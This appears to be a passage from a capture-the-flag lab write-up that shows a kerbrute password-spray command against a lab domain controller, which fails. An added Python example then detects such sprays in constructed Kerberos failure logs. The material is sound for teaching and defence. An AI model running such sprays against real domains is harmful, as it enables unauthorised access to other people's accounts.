Password Spraying Attack


The backup archive found in one of the target SMB shares, accessible by anyone, holds a vital set of files containing credentials for the entire domain. Testing suggests those files are outdated, as only a single domain user validated, but the hashdump result shows a few CLEARTEXT credentials.

┌──(kali㉿kali)-[~/…/labs/apt/smb/hashdump]
└─$ kerbrute passwordspray --dc apt.htb.local -d HTB.LOCAL ./users.txt 'Password123!'
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
version: v1.0.3 (9dad6e1) - 10/22/23 - Ronnie Flathers @ropnop
 
2023/10/22 19:16:37 >  Using KDC(s):
2023/10/22 19:16:37 >  	apt.htb.local:88
 
2023/10/22 19:34:44 >  Done! Tested 2000 logins (0 successes) in 1086.574 seconds

The password spraying attack failed. No domain user matches the CLEARTEXT password 'Password123!'.
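
From the defender's side, a Kerberos spray like the run above appears on the domain controller as pre-authentication failures for many different accounts from one source. The sketch below is an added example, not part of the original write-up or of kerbrute: it flags that pattern in constructed log records. The record layout, IP addresses, account names and thresholds are assumptions, and it presumes Kerberos Authentication Service auditing is enabled so that events 4771 and 4768 are logged.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (timestamp, event ID, status code, client IP, account).
# The field layout is an assumption for this example, not a real export format.
# 4771/0x18 = Kerberos pre-authentication failed (wrong password);
# 4768/0x6  = TGT requested for an unknown principal.
SAMPLE = """\
2023-10-22T19:16:37,4771,0x18,10.10.14.5,alice
2023-10-22T19:16:38,4768,0x6,10.10.14.5,bob
2023-10-22T19:16:38,4771,0x18,10.10.14.5,carol
2023-10-22T19:16:39,4771,0x18,10.10.14.5,dave
2023-10-22T19:16:40,4768,0x6,10.10.14.5,erin
2023-10-22T19:20:00,4771,0x18,10.10.10.50,alice
2023-10-22T19:20:05,4771,0x18,10.10.10.50,alice
2023-10-22T19:20:09,4771,0x18,10.10.10.50,alice
2023-10-22T19:45:00,4771,0x18,10.10.10.77,frank
2023-10-22T21:45:00,4771,0x18,10.10.10.77,grace
"""

FAILURES = {("4771", "0x18"), ("4768", "0x6")}

def parse(text):
    for line in text.strip().splitlines():
        ts, event_id, status, ip, account = line.split(",")
        if (event_id, status.lower()) in FAILURES:
            yield datetime.fromisoformat(ts), ip, account.lower()

def detect_spray(text, window=timedelta(minutes=5), min_accounts=4):
    """Return {source_ip: max distinct failed accounts in any window} for sprayers."""
    by_ip = defaultdict(list)
    for ts, ip, account in sorted(parse(text)):
        by_ip[ip].append((ts, account))
    flagged = {}
    for ip, events in by_ip.items():
        start, best = 0, 0
        for end in range(len(events)):
            # Slide the window start forward until it is within `window` of the current event.
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, len({acct for _, acct in events[start:end + 1]}))
        # Many distinct accounts from one source is the spray signature;
        # repeated failures on one account (a typo, a stale service) are not.
        if best >= min_accounts:
            flagged[ip] = best
    return flagged

if __name__ == "__main__":
    print(detect_spray(SAMPLE))
```

The run above tested 2000 logins in about 18 minutes, roughly two per second, so even a short window with a low distinct-account threshold would catch it; slower sprays need a longer window.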